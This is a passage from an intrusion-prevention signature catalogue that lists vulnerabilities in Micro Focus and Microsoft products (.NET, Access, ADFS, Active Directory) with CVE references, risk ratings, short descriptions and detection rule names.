sgpkg-ips-1296-5242

Platform:

Generic

Software:

Micro Focus GroupWise

Type:

Integer Overflow

Description:

Improper parsing of HTTP requests causes an integer overflow in Micro Focus GroupWise. A successful exploit allows an attacker to run arbitrary code on the target system.

Situation:

HTTP_CRL-Micro-Focus-Groupwise-Post-Office-Agent-Integer-Overflow

References:

CVE-2016-5762
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5762

Micro-Focus-NetIQ-Access-Manager-Identity-Server-Directory-Traversal

About this vulnerability:

A vulnerability in Micro Focus NetIQ Access Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1042-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Micro Focus NetIQ Access Manager

Type:

Directory Traversal

Description:

Insufficient validation of URL parameters causes a directory traversal vulnerability in Micro Focus NetIQ Access Manager. A successful exploit allows an attacker to access arbitrary files on the target system.

Situation:

HTTP_CRL-Micro-Focus-NetIQ-Access-Manager-Identity-Server-Ospuibasicssodownload-Directory-Traversal

References:

CVE-2017-14803
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14803

Micro-Focus-NetIQ-Sentinel-Server-Reportviewservlet-Directory-Traversal

About this vulnerability:

A vulnerability in Micro Focus NetIQ Sentinel

Risk:

Moderate

First detected in:

sgpkg-ips-782-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Micro Focus NetIQ Sentinel

Type:

Directory Traversal

Description:

Improper file name parameter validation in the Micro Focus NetIQ Sentinel Server causes a directory traversal vulnerability, which when successfully exploited can allow an attacker to read arbitrary files on the target system.

Situation:

HTTP_CRL-Micro-Focus-NetIQ-Sentinel-Server-Reportviewservlet-Directory-Traversal

References:

CVE-2016-1605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1605

Micro-Focus-NetIQ-Sentinel-Server-Sentinelcontext-Authentication-Bypass

About this vulnerability:

A vulnerability in Micro Focus NetIQ Sentinel

Risk:

Moderate

First detected in:

sgpkg-ips-780-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Micro Focus NetIQ Sentinel

Type:

Malfunction

Description:

Improper handling of authentication cookies results in an authentication bypass vulnerability which allows an attacker to gain administrative privileges on the target server by means of a crafted HTTP request.

Situation:

HTTP_CS-Micro-Focus-NetIQ-Sentinel-Server-Sentinelcontext-Authentication-Bypass

References:

CVE-2016-1605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1605

Micro-Focus-Operations-Bridge-Manager-Authenticated-RCE

About this vulnerability:

A vulnerability in Micro Focus Operations Bridge Manager

Risk:

High

First detected in:

sgpkg-ips-1350-5242

Last changed:

sgpkg-ips-1350-5242

Platform:

Generic

Software:

Micro Focus Operations Bridge Manager

Type:

Input Validation

Description:

There exists a vulnerability in Micro Focus Operations Bridge Manager, versions 2020.05 and before, and multiple other Micro Focus products, which allows remote attackers to execute arbitrary code via an authenticated Java deserialization.

Situation:

HTTP_CRL-Micro-Focus-Operations-Bridge-Manager-Authenticated-RCE

References:

CVE-2020-11853
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11853

Micro-Focus-Operations-Bridge-Reporter-Unauthenticated-Command-Injection

About this vulnerability:

A vulnerability in Micro Focus Operations Bridge Manager.

Risk:

High

First detected in:

sgpkg-ips-1366-5242

Last changed:

sgpkg-ips-1366-5242

Platform:

Unix

Software:

Micro Focus Operations Bridge Manager

Type:

Input Validation

Description:

A vulnerability in Micro Focus Operations Bridge Manager, versions 10.40 and before, which allows remote attackers to execute arbitrary commands via the userName parameter during login, due to insufficient user input validation.

Situation:

HTTP_CRL-Micro-Focus-Operations-Bridge-Reporter-Unauthenticated-Command-Injection

References:

CVE-2021-22502
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22502

Micro-Focus-Rumba-Walldata.macro-Playmacro-Memory-Corruption

About this vulnerability:	A vulnerability in Micro Focus Rumba
Risk:	Moderate
First detected in:	sgpkg-ips-774-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Micro Focus Rumba
Type:	Buffer Overflow
Description:	There exists a buffer overflow vulnerability in WallData.Macro ActiveX control of Micro Focus Rumba. A remote, unauthenticated attacker can use this to execute arbitrary code on the affected system.
Situation:	File-Text_Micro-Focus-Rumba-Walldata.macro-Playmacro-Memory-Corruption

Micro-Focus-Secure-Messaging-Gateway-Command-Injection

About this vulnerability:

A vulnerability in Micro Focus Secure Messaging Gateway

Risk:

High

First detected in:

sgpkg-ips-1285-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Micro Focus Secure Messaging Gateway

Type:

Input Validation

Description:

There exists a vulnerability in Micro Focus Secure Messaging Gateway, prior to July 2020 release, which allows remote attackers to execute arbitrary commands due to improper validation of the SaveData parameter within the manage_domains_save_data.json.php.

Situation:

HTTP_CRL-Micro-Focus-Secure-Messaging-Gateway-Command-Injection

References:

CVE-2020-11852
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11852

Micro-Focus-Secure-Messaging-Gateway-Enginelist.php-SQL-Injection

About this vulnerability:

A vulnerability in Micro Focus Secure Messaging Gateway

Risk:

Moderate

First detected in:

sgpkg-ips-1100-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Micro Focus Secure Messaging Gateway

Type:

Input Validation

Description:

There has been reported a SQL injection vulnerability in Micro Focus Secure Messaging Gateway. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target service. Successful exploitation can result execution of arbitrary SQL queries.

Situation:

HTTP_CRL-Micro-Focus-Secure-Messaging-Gateway-Enginelist.php-SQL-Injection

References:

CVE-2018-12464
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12464

Micro-Focus-UCMDB-Java-Deserialization-Unauthenticated-RCE

About this vulnerability:

A vulnerability in Micro Focus Operations Bridge Manager

Risk:

High

First detected in:

sgpkg-ips-1350-5242

Last changed:

sgpkg-ips-1350-5242

Platform:

Windows; Linux

Software:

Micro Focus Operations Bridge Manager

Type:

Input Validation

Description:

There exists a vulnerability in Micro Focus Operations Bridge Manager, versions 2020.05 and before, which allows remote attackers to execute arbitrary code via a hardcoded password CVE-2020-11853 and Java deserialization CVE-2020-11854 using certain services.

Situation:

HTTP_CRL-Micro-Focus-UCMDB-Java-Deserialization-Unauthenticated-RCE

References:

CVE-2020-11853
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11853

Microsoft-.NET-FormatFtpCommand-Crlf-Injection-Arbitrary-File-Write-And-Deletion

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

High

First detected in:

sgpkg-ips-1695-5242

Last changed:

sgpkg-ips-1695-5242

Platform:

Windows

Software:

Microsoft .NET Framework; Microsoft Visual Studio

Type:

Input Validation

Description:

An arbitrary file write and deletion vulnerability has been reported in the Microsoft .NET Framework and Visual Studio. An attacker could exploit this vulnerability by sending malicious request to the FTP servers. Successful exploitation could allow the attacker write or delete files in the context of the FTP server.

Situation:

FTP_Pipeline-Detected

References:

CVE-2023-36049
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36049

ms23-nov
http://technet.microsoft.com/security/bulletin/ms23-nov

Microsoft-.NET-Framework-CVE-2015-6115-ASLR-Security-Bypass

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

Moderate

First detected in:

sgpkg-ips-705-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft .NET Framework

Type:

Malfunction

Description:

There exists a security feature bypass vulnerability in Microsoft .NET Framework.

Situation:

File-OLE_Microsoft-.NET-Framework-CVE-2015-6115-ASLR-Security-Bypass
File-RTF_Microsoft-.NET-Framework-CVE-2015-6115-ASLR-Security-Bypass
File-TextId_Microsoft-.NET-Framework-CVE-2015-6115-ASLR-Security-Bypass

References:

CVE-2015-6115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6115

MS15-118
http://technet.microsoft.com/security/bulletin/MS15-118

Microsoft-.NET-Framework-Heap-Corruption-CVE-2012-0015

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

Moderate

First detected in:

sgpkg-ips-818-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft .NET Framework

Type:

Buffer Overflow

Description:

There exists a heap corruption vulnerability in Microsoft's .NET Framework. A remote attacker could use this to execute arbitrary code on the affected system.

Situation:

File-TextId_Microsoft-.NET-Framework-Heap-Corruption-CVE-2012-0015

References:

CVE-2012-0015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0015

OSVDB-79261
http://www.osvdb.org/79261

MS12-016
http://technet.microsoft.com/security/bulletin/MS12-016

Microsoft-.NET-Framework-Improper-Execution-Of-Function-Pointer

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

Moderate

First detected in:

sgpkg-ips-460-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft .NET Framework

Type:

Malfunction

Description:

A code execution vulnerability has been reported in Microsoft's .NET Framework. The vulnerability is due to improper execution of a function pointer. A remote attacker can exploit this vulnerability by enticing an unsuspecting user to access a malicious web page. This may result in code execution in the context of the affected user. If code execution is unsuccessful, the affected application may terminate abnormally.

Situation:

File-Exe_Microsoft-.NET-Framework-Improper-Execution-Of-Function-Pointer
File-TextId_Microsoft-.NET-Framework-Improper-Execution-Of-Function-Pointer

References:

CVE-2012-1855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1855

OSVDB-82859
http://www.osvdb.org/82859

MS12-038
http://technet.microsoft.com/security/bulletin/MS12-038

Microsoft-.NET-Framework-Information-Disclosure-CVE-2024-29059

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

High

First detected in:

sgpkg-ips-1833-5242

Last changed:

sgpkg-ips-1833-5242

Platform:

Windows

Software:

Microsoft .NET Framework

Type:

Malfunction

Description:

An information disclosure vulnerability has been reported in Microsoft .NET framework. An unauthenticated attacker can use this vulnerability to leak internal object URIs via crafted HTTP requests.

Situation:

HTTP_CSH-Microsoft-.NET-Framework-Information-Disclosure-CVE-2024-29059

References:

CVE-2024-29059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29059

ms24-jan
http://technet.microsoft.com/security/bulletin/ms24-jan

Microsoft-.NET-Framework-Proxy-Auto-Discovery-Code-Execution

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

High

First detected in:

sgpkg-ips-494-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft .NET Framework

Type:

Malfunction

Description:

An code execution vulnerability has been reported in Microsoft .NET Framework. The vulnerability is due to the way the framework handles the proxy auto-configuration JavaScript. A remote unauthenticated attacker can exploit this vulnerability by spoofing a proxy auto-configuration (PAC) file location or contents, using techniques such as ARP cache poisoning on local network, NetBios Name Service (NBNS) spoofing, or DNS spoofing; or use social engineering to entice the user to use the malicious PAC URL. The attacker could craft PAC JavaScript code in such a way that it executes restricted code with full access permissions of the currently logged in user.

Situation:

File-Text_Microsoft-.NET-Framework-Proxy-Auto-Discovery-Code-Execution

References:

CVE-2012-4776
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4776

BID-56463
http://www.securityfocus.com/bid/56463

OSVDB-87266
http://www.osvdb.org/87266

MS12-074
http://technet.microsoft.com/security/bulletin/MS12-074

Microsoft-.NET-Framework-S.DS.P-Namespace-Method-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft .NET Framework

Type:

Buffer Overflow

Description:

A buffer overflow exists in the System.DirectoryServices.Protocols (S.DS.P) namespace method in the .NET framework. The vulnerability is due to an error in the validation of the size of objects in memory prior to copying them into an array. An attacker can remotely exploit this vulnerability by enticing a user to open a web page containing a specially crafted XBAP (XAML browser application). In addition, this vulnerability can also be exploited locally by a logged-in user to escape Windows Code Access Security (CAS) Restrictions. Successful remote exploitation would allow arbitrary code execution in the context of the logged-in user.

Situation:

File-Exe_Microsoft-.NET-Framework-S.DS.P-Namespace-Method-Buffer-Overflow

References:

CVE-2013-0003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0003

BID-57114
http://www.securityfocus.com/bid/57114

OSVDB-88964
http://www.osvdb.org/88964

MS13-004
http://technet.microsoft.com/security/bulletin/MS13-004

Microsoft-.NET-Framework-Silverlight-Class-Inheritance-Code-Execution

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

High

First detected in:

sgpkg-ips-973-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft .NET Framework; Silverlight

Type:

Malfunction

Description:

There exists a code execution vulnerability in the Microsoft .NET and Silverlight frameworks. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

HTTP_CSU-Microsoft-.NET-Framework-Silverlight-Class-Inheritance-Code-Execution
File-Exe_Microsoft-.NET-Framework-Silverlight-Class-Inheritance-Code-Execution

References:

CVE-2011-1253
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1253

OSVDB-76214
http://www.osvdb.org/76214

MS11-078
http://technet.microsoft.com/security/bulletin/MS11-078

Microsoft-.NET-Framework-Winforms-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

Moderate

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft .NET Framework

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Microsoft .NET Framework Windows Form. The vulnerability is due to a race condition when handling the size of an array of objects prior to copying them into a global memory buffer. An attacker can remotely exploit this vulnerability by enticing a user to open a web page containing a specially crafted XBAP (XAML browser application). In addition, this vulnerability can also be exploited locally by a logged-in user to escape Windows Code Access Security (CAS) Restrictions. Successful remote exploitation would allow arbitrary code execution in the context of the logged-in user.

Situation:

File-Exe_Microsoft-.NET-Framework-Winforms-Buffer-Overflow

References:

CVE-2013-0002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0002

BID-57126
http://www.securityfocus.com/bid/57126

OSVDB-88963
http://www.osvdb.org/88963

MS13-004
http://technet.microsoft.com/security/bulletin/MS13-004

Microsoft-.NET-Framework-Winforms-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft .NET Framework

Type:

Malfunction

Description:

An information disclosure vulnerability exists in Microsoft .NET Framework Windows Form. The vulnerability is due to the way WinForms handles pointers to unmanaged memory locations. A remote, unauthenticated attacker can exploit this vulnerability by either enticing a user to visit a maliciously crafted website containing a specially crafted XML browser application or by using Windows .NET Framework applications to bypass Code Access Security (CAS) restrictions. In both cases exploit will result in privilege escalation, leading to information disclosure.

Situation:

File-Exe_Microsoft-.NET-Framework-Winforms-Information-Disclosure

References:

CVE-2013-0001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0001

BID-57124
http://www.securityfocus.com/bid/57124

OSVDB-88962
http://www.osvdb.org/88962

MS13-004
http://technet.microsoft.com/security/bulletin/MS13-004

Microsoft-.NET-Framework-Xaml-Browser-Applications-Stack-Corruption

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

Moderate

First detected in:

sgpkg-ips-432-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft .NET Framework

Type:

Malfunction

Description:

A code execution vulnerability exists in the Microsoft .NET Framework. The vulnerability is due to memory corruption when handling method calls that take structures with misaligned fields as parameters. Remote attackers could exploit this vulnerability by either enticing target users to visit a malicious web page containing an XBAP (XAML browser application), or by uploading an ASP.NET application to a vulnerable server. Successful exploitation could result in execution of arbitrary code within the security context of the currently logged on user. An unsuccessful exploit attempt may terminate the PresentationHost.exe .NET component.

Situation:

File-Exe_Microsoft-.NET-Framework-Xaml-Browser-Applications-Stack-Corruption

References:

CVE-2010-3958
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3958

MS11-028
http://technet.microsoft.com/security/bulletin/MS11-028

Microsoft-.NET-Framework-Xml-Digital-Signature-Spoofing

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

High

First detected in:

sgpkg-ips-525-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft .NET Framework

Type:

Input Validation

Description:

A spoofing vulnerability has been reported in Microsoft .NET Framework. The vulnerability is due to Microsoft .NET Framework fails to properly validate the signature of a specially crafted XML file. An attacker can exploit this vulnerability to modify the content of an XML file without invalidating the signature associated with the file.

Situation:

File-TextId_Microsoft-.NET-And-Oracle-Java-SE-Xml-Digital-Signature-Spoofing

References:

CVE-2013-1336
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1336

BID-59789
http://www.securityfocus.com/bid/59789

OSVDB-93301
http://www.osvdb.org/93301

MS13-040
http://technet.microsoft.com/security/bulletin/MS13-040

Microsoft-.NET-Framework-Xml-Signature-Validation-Entity-Expansion-DOS

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft .NET Framework

Type:

Resource Starvation

Description:

A denial-of-service vulnerability exists in Microsoft .NET Framework. The vulnerability is due to the way the .NET framework parses a crafted document type definition (DTD) for XML data when an XML digital signature is validated. A remote attacker could exploit this vulnerability by submitting an XML document with a crafted DTD. Successful exploitation could result in the application terminating or becoming unresponsive, resulting in a denial-of-service condition.

Situation:

HTTP_CS-Xml-Dtd-Nested-Entities-Multiple-Vulnerabilities
File-Text_Xml-Dtd-Nested-Entities-Multiple-Vulnerabilities

References:

CVE-2013-3860
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3860

BID-62820
http://www.securityfocus.com/bid/62820

OSVDB-98215
http://www.osvdb.org/98215

MS13-082
http://technet.microsoft.com/security/bulletin/MS13-082

Microsoft-.NET-Framework-XPS-File-Parsing-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

Moderate

First detected in:

sgpkg-ips-1258-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft .NET Framework

Type:

Input Validation

Description:

There exists a remote code execution vulnerability in Microsoft .NET Framework. Successful exploitation requires user interaction with a specially crafted XPS file.

Situation:

File-TextId_Microsoft-.NET-Framework-XPS-File-Parsing-Remote-Code-Execution

References:

CVE-2020-0605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0605

Microsoft-.NET-Privilege-Escalation-CVE-2015-6096

About this vulnerability:

A vulnerability in Microsoft .NET

Risk:

Moderate

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft .NET Framework

Type:

Malfunction

Description:

A vulnerability in Microsoft .NET

Situation:

File-Text_Microsoft-.NET-Privilege-Escalation-CVE-2015-6096

References:

CVE-2015-6096
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6096

MS15-118
http://technet.microsoft.com/security/bulletin/MS15-118

Microsoft-Access-CVE-2013-3157-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Access

Risk:

Moderate

First detected in:

sgpkg-ips-554-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Office Access; Microsoft Office

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Access. The vulnerability exists in the way that Microsoft Access parses content in Access files. By enticing an target user to open a crafted Access file, an attacker can exploit this vulnerability to execute arbitrary code with the privileges of the logged on user.

Situation:

File-Binary_Microsoft-Access-CVE-2013-3157-Memory-Corruption

References:

CVE-2013-3157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3157

BID-62231
http://www.securityfocus.com/bid/62231

OSVDB-97112
http://www.osvdb.org/97112

MS13-074
http://technet.microsoft.com/security/bulletin/MS13-074

Microsoft-Access-Wizard-ActiveX-Control-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Office Access

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office Access; Microsoft Office

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Access Wizard ActiveX Control.

Situation:

HTTP_SS-Microsoft-Access-Wizard-ActiveX-Control-Memory-Corruption
File-OLE_Microsoft-Access-Wizard-ActiveX-Control-Memory-Corruption
File-Text_Microsoft-Access-Wizard-ActiveX-Control-Memory-Corruption

References:

CVE-2010-1881
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1881

BID-41442
http://www.securityfocus.com/bid/41442

MS10-044
http://technet.microsoft.com/security/bulletin/MS10-044

Microsoft-Active-Directory-Domain-Services-Elevation-Of-Privilege

About this vulnerability:

A vulnerability in Microsoft Windows Server

Risk:

High

First detected in:

sgpkg-ips-1427-5242

Last changed:

sgpkg-ips-1427-5242

Platform:

Windows

Software:

Windows Server

Type:

Malfunction

Description:

An elevation of privilege vulnerability has been reported in Microsoft Active Directory Domain Services. The vulnerability allows potential attackers to impersonate a domain controller using computer account sAMAccountName spoofing. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to target server. Successful exploitation could allow the attacker to elevate their privileges in Active Directory.

Situation:

LDAP_CS-Microsoft-Active-Directory-Domain-Services-Elevation-Of-Privilege

References:

CVE-2021-42278
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42278

ms21-nov
http://technet.microsoft.com/security/bulletin/ms21-nov

Microsoft-Active-Directory-Federation-Services-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows Server

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There is a code execution vulnerability in Active Directory Federation Services (ADFS). The flaw is due to insufficient validation of HTTP request headers sent by authenticated clients. A remote authenticated attacker can exploit this vulnerability by sending maliciously crafted HTTP requests to Web servers that support ADFS. Successful exploitation would allow an attacker to perform actions on the IIS server within the security context of the Worker Process Identity (WPI), which by default is configured with Network Service account privileges.

Situation:

HTTPS_CS-Microsoft-Active-Directory-Federation-Services-Code-Execution

References:

CVE-2009-2509
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2509

BID-37214
http://www.securityfocus.com/bid/37214

MS09-070
http://technet.microsoft.com/security/bulletin/MS09-070

Microsoft-Active-Directory-Federation-Services-Information-Disclosure

About this vulnerability:

A vulnerability Microsoft Active Directory Federation Services

Risk:

High

First detected in:

sgpkg-ips-537-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2008

Software:

<os>

Type:

Malfunction

Description:

There is an information disclosure vulnerability in Microsoft Active Directory Federation Services (ADFS).

Situation:

File-TextId_MS-Active-Directory-Federation-Services-Information-Disclosure

References:

CVE-2013-3185
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3185

MS13-066
http://technet.microsoft.com/security/bulletin/MS13-066

Microsoft-Active-Directory-Federation-Services-XSS-CVE-2015-1757

About this vulnerability:

A vulnerability in Microsoft Active Directory Federation Services

Risk:

Moderate

First detected in:

sgpkg-ips-652-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2008; Windows 2008 R2; Windows 2012

Software:

<os>

Type:

Cross-site Scripting

Description:

There is a cross-site scripting (XSS) vulnerability in Microsoft Active Directory Federation Services that could allow elevation of privilege.

Situation:

HTTP_CRL-Microsoft-Active-Directory-Federation-Services-XSS-CVE-2015-1757

References:

CVE-2015-1757
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1757

MS15-062
http://technet.microsoft.com/security/bulletin/MS15-062

Microsoft-Active-Directory-LDAP-Query-Handling-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-385-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There exists a denial of service vulnerability in the Microsoft Active Directory. The vulnerability is caused by improper handling of specifically crafted LDAP requests. A remote attacker can exploit this vulnerability to create a denial of service condition on the target system.

Situation:

LDAP_CS-Microsoft-Active-Directory-LDAP-Query-Handling-Denial-Of-Service

References:

CVE-2008-0088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0088

BID-27638
http://www.securityfocus.com/bid/27638

MS08-003
http://technet.microsoft.com/security/bulletin/MS08-003

Microsoft-Active-Template-Library-Remote-Code-Execution-MS09-060

About this vulnerability:

A remote code execution vulnerability in Windows Active Template Library

Risk:

High

First detected in:

sgpkg-ips-258-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a remote code execution vulnerability in Microsoft Active Template Library.

Situation:

HTTP_SS-Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow
File-Text_Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow

References:

CVE-2009-0901
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0901

BID-35832
http://www.securityfocus.com/bid/35832

MS09-060
http://technet.microsoft.com/security/bulletin/MS09-060

Microsoft-ActiveX-Code-Execution-CVE-2012-0158

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-446-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Windows

Situation:

File-OLE_Microsoft-ActiveX-Code-Execution-CVE-2012-0158
File-RTF_Microsoft-ActiveX-Code-Execution-CVE-2012-0158

References:

CVE-2012-0158
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158

BID-52911
http://www.securityfocus.com/bid/52911

MS12-027
http://technet.microsoft.com/security/bulletin/MS12-027

Microsoft-ActiveX-Data-Objects-Cachesize-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Data Access Components

Risk:

Moderate

First detected in:

sgpkg-ips-847-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Data Access Components

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft ActiveX Data Objects.

Situation:

File-Text_Microsoft-ActiveX-Data-Objects-Cachesize-Memory-Corruption

References:

CVE-2012-1891
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1891

OSVDB-83657
http://www.osvdb.org/83657

MS12-045
http://technet.microsoft.com/security/bulletin/MS12-045

Microsoft-ADFS-Remote-Code-Execution-CVE-2009-2509

About this vulnerability:

A remote code execution vulnerability in Active Directory Federation Services

Risk:

High

First detected in:

sgpkg-ips-270-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a remote code execution vulnerability in Active Directory Federation Services.

Situation:

HTTP_CSH-Microsoft-ADFS-Remote-Code-Execution-CVE-2009-2509

References:

CVE-2009-2509
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2509

MS09-070
http://technet.microsoft.com/security/bulletin/MS09-070

Microsoft-Adobe-Font-Manager-Library-Type-1-Vtohorigin-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1248-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

Improper handling of VToHOrigin records in multiple master Type 1 fonts causes a buffer overflow in Windows. A successful exploit may allow an attacker to execute code with high privileges on the target system.

Situation:

File-TextId_Microsoft-Adobe-Font-Manager-Library-Type-1-Vtohorigin-Handling-Buffer-Overflow

References:

CVE-2020-1020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1020

Microsoft-Anti-XSS-Library-Bypass-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Anti-XSS Library

Risk:

Moderate

First detected in:

sgpkg-ips-433-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Anti-XSS Libarary

Type:

Cross-site Scripting

Description:

There is a vulnerability in the Microsoft Anti-Cross Site Scripting Library.

Situation:

HTTP_CRL-Microsoft-Anti-XSS-Library-Bypass-Vulnerability

References:

CVE-2012-0007
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0007

BID-51291
http://www.securityfocus.com/bid/51291

MS12-007
http://technet.microsoft.com/security/bulletin/MS12-007

Microsoft-ASP.NET-Error-Handling-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

High

First detected in:

sgpkg-ips-379-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft .NET Framework; IIS 7.0

Type:

Malfunction

Description:

A denial of service vulnerability exists within Microsoft ASP.NET.

Situation:

HTTP_CSU-Microsoft-ASP.NET-Error-Handling-Denial-Of-Service

References:

CVE-2009-1536
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1536

BID-35985
http://www.securityfocus.com/bid/35985

OSVDB-56905
http://www.osvdb.org/56905

MS09-036
http://technet.microsoft.com/security/bulletin/MS09-036

Microsoft-ASP.NET-Forms-Authentication-Elevation-Of-Privilege

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

Moderate

First detected in:

sgpkg-ips-432-4219

Last changed:

sgpkg-ips-1745-5242

Platform:

Windows

Software:

Microsoft .NET Framework

Type:

Malfunction

Description:

